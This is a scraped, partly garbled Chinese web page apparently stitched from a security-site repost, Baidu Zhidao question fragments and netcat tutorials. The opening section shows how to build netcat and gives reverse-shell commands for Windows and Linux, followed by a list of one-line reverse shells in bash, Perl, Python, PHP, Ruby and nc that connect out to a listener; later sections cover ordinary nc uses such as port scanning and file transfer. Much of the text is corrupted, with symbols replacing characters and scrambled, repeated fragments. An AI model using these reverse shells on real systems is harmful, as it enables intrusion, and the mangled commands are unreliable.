linux netcat linux 下载的问题,请求帮助

如何在linux下编译netcat并且反弹cmdshell
&本地Windows监听
nc -vv -l -p 1234&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&
&首先从sf上get一个tar的压缩包
wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz
然后当然是解压了
tar zxvf netcat-0.7.1.tar.gz
&解压完毕之后会生成目录,要cd进去
cd netcat-0.7.1
然后进行编译前的配置。
./configure
&配置完了之后就可以make编译了。
&编译成功就生成了netcat可执行的文件了,位于src目录,cd进去进行运行./netcat -h.如图
本地Windows监听
nc -vv -l -p 1234&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
远程Windows转发
nc -t -e C:\WINDOWS\system32\cmd.exe 8.8.8.8 1234
远程Linux转发
./netcat&8.8.8.8&1234 -e /bin/sh
ReverseShell.c
ReverseShell.pl
ReverseShell.py
phpspy.php
&&&&&&&&NetCat for linux 参数e&&&&&&&&-
wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz
tar zxvf netcat-0.7.1.tar.gz
cd netcat-0.7.1
./configure
./netcat -h
&&&&&&&&&&&&&&&&&&&&&&&
一句话反弹命令
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
bash -i && /dev/tcp/10.0.0.1/
perl -e &use S$i=&10.0.0.1&P;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&tcp&));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&&&S&);open(STDOUT,&&&S&);open(STDERR,&&&S&);exec(&/bin/sh -i&);};&
python -c &import socket,subprocess,s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&10.0.0.1&P,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&/bin/sh&,&-i&]);&
php -r &$sock=fsockopen(&10.0.0.1&P,1234);exec(&/bin/sh -i &&3 &&3 2&&3&P);&
ruby -rsocket -e&f=TCPSocket.open(&10.0.0.1&P,1234).to_i;exec sprintf(&/bin/sh -i &&%d &&%d 2&&%d&,f,f,f)&
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&&1|nc 10.0.0.1 1234 &/tmp/f
&===========================================
【声明】:黑吧安全网()登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱,我们会在最短的时间内进行处理。
上一篇:【】【】linux netcat的问题,请求帮助_百度知道
linux netcat的问题,请求帮助
我有更好的答案
7,位于src目.tar。 编译成功就生成了netcat可执行的文件了etcat-0,要cd进去 cd netcat-0.1 然后进行编译前的配置.1..1。 .7.gz 解压完毕之后会生成目录.7.configure 配置完了之后就可以make编译了.gz 然后当然是解压了 tar zxvf netcat-0.&#47.
其他类似问题
为您推荐:
linux的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁linux netcat的问题,请求帮助_百度知道
linux netcat的问题,请求帮助
我有更好的答案
nc.net/eechen/blog/206444" target="_blank">http.oschina.rpm" target="_blank">http://mirror://my.el6.84-22.centos.centos.84-22.x86_64,而不是经典的netcat-traditional://vault.x86_64.org/centos/6/os/x86_64/Packages/nc-1://vault.rpm源代码.el6.rpmUbuntu上默认安装的是netcat-openbsd.centos.net/eechen/blog/206444 yum install nc二进制文件http.org/6;bin&#47://mirror.org/centos/6/os/x86_64/Packages/nc-1.el6,选择&#47.src.el6.84-22.centos. sudo apt-get -y install netcat-traditional 设置默认的nc.org/6.src.84-22:<a href="http.oschina.4/os/Source/SPackages/nc-1:<a href="http://my
etcat-0.7.1.tar.gz 然后当然是解压了 tar zxvf netcat-0.7.1.tar.gz 解压完毕之后会生成目录,要cd进去 cd netcat-0.7.1 然后进行编译前的配置。 ./configure 配置完了之后就可以make编译了。 编译成功就生成了netcat可执行的文件了,位于src目...
其他类似问题
为您推荐:
linux的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁下次自动登录
现在的位置:
& 综合 & 正文
linux 下的socket 调试工具
netcat 使用
download link:
该工具有三种模式:
1. client 模式
netcat [options]
2. server模式
netcat -l -p port
3. tunel 模式
....... not used
输入和输出数据都 使用 hexdump 格式
文本格式的输入和输出都没问题,但是二进制的输入 可能会有点问题,见下面
相关工具:
二进制dump 和生成工具
dump 成 16进制的字符串 格式化后显示
file | stdin
2. 将输入的16进制字符串
反转为 二进制文件
-p plain text .
30 3233 34 转换为二进制的
echo "00 30 3233 34" | xxd -r -p
通过网络发送,并使用16进制dump出内容显示在STDOUT
echo "00 30 3233 34" | xxd -r -p | netcat -x 127.0.0.1 8888
vi 二进制编辑
vi XXXX.so -b
进入后, 输入
直接对16进制的格式进行编辑,
[但不要保存 !!!!!]
输入 :%!xxd -r
然后保存,退出 --》OK
&&&&推荐文章:
【上篇】【下篇】Linux安全网 --- 专注Linux操作系统安全运维。
功能说明:功能强大的网络工具
语  法:&[-hruz][-g&网关...&][-G&指向器数目&][-i&延迟秒数&][-o&输出文件&][-p&通信端口&][-s&来源位址&][-v...][-w&超时秒数&][主机名称][通信端口...]
参  数:
&&-g&网关&&&&设置路由器跃程通信网关,最丢哦可设置8个。
&&-G&指向器数目&&&&设置来源路由指向器,其数值为4的倍数。
&&-h&&&在线帮助。
&&-i&延迟秒数&&&&设置时间间隔,以便传送信息及扫描通信端口。
&&-l&&&使用监听模式,管控传入的资料。
&&-n&&&直接使用IP地址,而不通过域名服务器。
&&-o&输出文件&&&&指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存。
&&-p&通信端口&&&&设置本地主机使用的通信端口。
&&-r&&&乱数指定本地与远端主机的通信端口。
&&-s&来源位址&&&&设置本地主机送出数据包的IP地址。
&&-u&&&使用UDP传输协议。
&&-v&&&显示指令执行过程。
&&-w&超时秒数&&&&设置等待连线的时间。
&&-z&&&使用0输入/输出模式,只在扫描通信端口时使用。
&linux nc (net)最新版源码下载及nc详解
扩展资料一:nc简单使用示例
简单用法举例
1)端口扫描
# nc -v -w 2 192.168.2.34 -z 21-24
nc: connect to 192.168.2.34 port 21 (t) fail: Connection refu
Connection to 192.168.2.34 22 port [tcp/ssh] cceeded!
nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused
2)从192.168.2.33拷贝文件到192.168.2.34
在192.168.2.34上: nc -l 1234 & test.txt
在192.168.2.33上: nc 192.168.2.34 & test.txt
3)简单聊天工具
在192.168.2.34上: nc -l 1234
在192.168.2.33上: nc 192.168.2.34 1234
这样,双方就可以相互交流了。使用cl+C(或D)退出。
3.用nc命令操作meached
1)存储数据:printf & key 0 10 6rnresultrn& |nc 192.168.2.34 11211
2)获取数据:printf &get keyrn& |nc 192.168.2.34 11211
3)删除数据:printf &delete keyrn& |nc 192.168.2.34 11211
4)查看状态:printf &srn& |nc 192.168.2.34 11211
5)模拟top命令查看状态:watch &echo stats& |nc 192.168.2.34 11211
6)清空缓存:printf &flush_allrn& |nc 192.168.2.34 11211 (小心操作,清空了缓存就没了)
nc -l 1234
nc 127.0.0.1 1234
在端口1234建立连接,互相发送输入
nc -p 1234 -w 5
建立从本地1234端口到的80端口连接,5秒超时
u为UDP连接
echo -n &GET / HTTP/1.0&r&n&r&n& | nc
连接到主机并执行
nc -v&-z& 70-80
扫描端口(70到80),可指定范围。-v输出详细信息。
扩展资料二:命令linux nc 命令传输文件
nc到底干嘛用的我不多描述,今天主要讲下用nc传输文件。由于公司的设备sudo后没有ssh,scp等远程接入命令,或host.deny里面设置了ssh的deny,不管怎样的原因。我今天跨过大家常用的scp,来说明下一个更有用的轻量级工具,nc的另一个强大的功---文件传输。
范例如下:
目的主机监听&
nc -l 监听端口&&& 要接收的文件名
nc -l 4444 & cache.tar.gz
源主机发起请求
nc&&目的主机ip& & 目的端口&
nc&&192.168.0.85&&4444&
[root@localhost jiangbao]# netstat -tpln
tcp& && &&&0& && &0 0.0.0.0:4444& && && && && & 0.0.0.0:*& && && && && && & LISTEN& && &18166/nc&&
英文描述如下&
DATA TRANSFER
Start by using nc to listen on a specific port, with output captured into a :
& && && &&&$ nc -l 1234 & filename.out
Using a second machine, connect to the listening nc process, feeding it the file
is to be transferred:
& && && &&&$ nc
扩展资料三:linux nc (NetCat) 命令详解,这篇文章对nc的介绍非常详细,和以上资料有部分重复.
通常的Linux发行版中都带有NetCat(简称nc),甚至在拯救模式光盘中也由busybox提供了 简版的nc工具。但不同的版本,其参数的使用略有差异。
NetCat 官方地址:
[root@hatest1 ~]# cat /etc/asianux-release
Asianux release 2.0 (Trinity SP2)
[root@hatest1 ~]# cat /etc/relag-release
Red Flag DC Server release 5.0 (Trinity SP2)
[root@hatest1 ~]# type -a nc
nc is /usr/bin/nc
[root@hatest1 ~]# rpm -q nc
nc-1.10-22
建议在使用前,先用man nc看看帮助。这里以红旗DC Server 5.0上的1.10版本进行简单说明。
假设两服务器信息:
server1: 192.168.228.221
server2: 192.168.228.222
二、常见使用
1、远程拷贝文件
从server1拷贝文件到server2上。需要先在server2上,用nc激活监听,server2上运行:
最新图文资讯
相关文章列表:
理智评论文明上网,拒绝恶意谩骂
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明

我要回帖

更多关于 请求帮助英语口语 的文章

 

随机推荐